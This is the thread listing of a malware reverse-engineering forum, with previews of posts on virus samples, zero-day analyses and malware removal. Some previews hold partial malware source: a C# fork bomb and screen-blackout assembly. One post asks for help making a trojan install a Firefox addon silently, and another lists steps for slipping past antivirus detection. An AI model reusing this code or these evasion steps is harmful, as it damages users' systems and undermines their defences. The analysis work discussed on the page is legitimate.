Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
360 topics in this forum
-
Dual OS Virus
by cyb3rl0rd1867- 5 replies
- 5.5k views
I recently heard about w32/simile virus that was dangerous for both linux and windows. More info here. I was curious to know what the header of such a file would look like, since microsoft uses Pe headers and linux uses elf headers. How would it be possible to make it compatible with both?
-
Malware+Custom Obfusc+No detections
by chickenbutt- 4 replies
- 6.1k views
I didn't look to see what this does, beyong dropping binaries and making services. It has to be rebuilt to load in olly(the dropped binaries). KIS 2010,NIS 2010,Avira 2010 didn't detect with high heuristics. It's all ring 3 dfgdfgdgdgf.zip
-
W32.BlackOut
by JMC31337- 0 replies
- 6.1k views
black out the GUI .386 .model flat extrn MessageBoxA:proc extrn GetDC:proc extrn SetPixel:proc extrn GetSystemMetrics:proc extrn MessageBoxA:proc extrn GetPixel:PROC extrn BitBlt:PROC .data xc dd 0 ;width yc dd 0 ;height x dd 0 ;x-co y dd 0 ;y-co dc dd 0 .code start: xor eax,eax push eax call GetDC mov dword ptr dc,eax push 16 call GetSystemMetrics mov dword ptr xc,eax push 17 call GetSystemMetri…
-
Netsky B
by JMC31337- 3 replies
- 4.2k views
...
-
Flash / PDF 0day Analysis
by frank_boldewin- 5 replies
- 4k views
http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ sebastian and me worked on that the last 2 days. maybe someone is interested. cheers, frank
-
C# Rabbit / Fork Bomb
by JMC31337- 0 replies
- 6.3k views
//JMC31337 //THE MAIN FORM CODE using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics;namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { string startpointPath = Application.ExecutablePath; for (int x = 0; x < 999999999; x++) { MessageBox.Show("RABBIT", "Attention"); Process.Sta…
-
Silent Firefox addon install
by Minister- 1 reply
- 3.5k views
Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF and the problem is - FF notifies user about it, spitting out window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it
-
Explore the Vulnerability in the following snippets - Help Requried
by mystery_reverser- 5 replies
- 5.9k views
Hello Guys, I am a newbie to reverse engineering vulnerabilities. Following are some of the vulnerable codes, for which I want to know the answer for the following questions. It would be great if you guys explain elaborately so that I can kick start my vulnerability analysis with a bang. Please help me out guys. You can mail me the answers to mysteryreverse@gmail.com or post it here as doc file. Regards, Mystery Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc
-
WINDAZ, sLOTz, FALAFEL, KSCRACKiNG
by Aguila- 3 replies
- 5.6k views
Some guy is spreading his bot via scene releases. Mirc.v7.0.Incl.Keymaker-WiNDAZ Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZJules.v2.0.Cracked-sLOTz Eastern.Slots.v3.0.Cracked-sLOTz Cortez.Treasure.v1.0.Cracked-sLOTzKaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNGWINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL FRESH.VIEW.V7.94.READ.NFO-FALAFEL FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL ........ Let's analyze his "work". idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C... Nothing discov…
-
Spyware and or adware ?
by iamlegend- 2 replies
- 3.4k views
Hey guys i know this is maybe not software but in any chance, do u have an example of spyware or adware script ? or maybe a site or something out there have these threats ? i need one or two for my research.. like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv thanks in advance
-
HTML CRYPTO TROJAN
by JMC31337- 0 replies
- 3.4k views
...
-
Interesting Stuff
by cyb3rl0rd1867- 5 replies
- 6.6k views
Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky Names: Trojan.win32.scar.bzuz Password:tuts4you syre32.rar
-
- 5 replies
- 4.4k views
An overview with some examples, written by ir3t from Black Storm Who said girls can't code !!? />http://portal.b-at-s.info/download.php?view.454
-
C# Replicator
by JMC31337- 0 replies
- 4.1k views
... moved to vxheavens
-
Mytob@MM
by JMC31337- 0 replies
- 3.1k views
...
-
W32 DLL Virii
by JMC31337- 0 replies
- 8.5k views
...
-
CardPay Ransomware
by JMC31337- 0 replies
- 3.1k views
...
-
Conficker Worm
by JMC31337- 0 replies
- 7.7k views
...
-
Icelords BIOS ROOTKIT
by JMC31337- 0 replies
- 3.4k views
...
-
Storm Worm
by JMC31337- 0 replies
- 3.2k views
...
-
MYDOOM WORMS
by JMC31337- 0 replies
- 3.3k views
...
-
W32/Sharp-A
by Programmdude- 0 replies
- 3.4k views
Hey, I was wondering if anyone had a copy of W32/Sharp-A. I would like it for researching it.http://www.sophos.com/security/analyses/viruses-and-spyware/w32sharpa.html
-
Reversinglabs - NyxEngine
by Loki- 0 replies
- 3.6k views
More nice work from ap0x and deroko. />http://blog.reversinglabs.com/2010/04/introducing-nyxengine/
-
Clever tricks against antiviruses...
by Teddy Rogers- 2 replies
- 3.7k views
I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics, if all other (signature) scans fail. The patterns they search for in your executable, are the functions being imported, and the order they are being called. No imports! Having no import table is relatively easy. There are however some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (…
-
Excellent video
by cyb3rl0rd1867- 5 replies
- 10.2k views
Here's an excellent video on malware removal by Mark Russinovich, author of many tools in the sysinternals suite. Very good for semi-beginners into the world of malware exploration and analysis.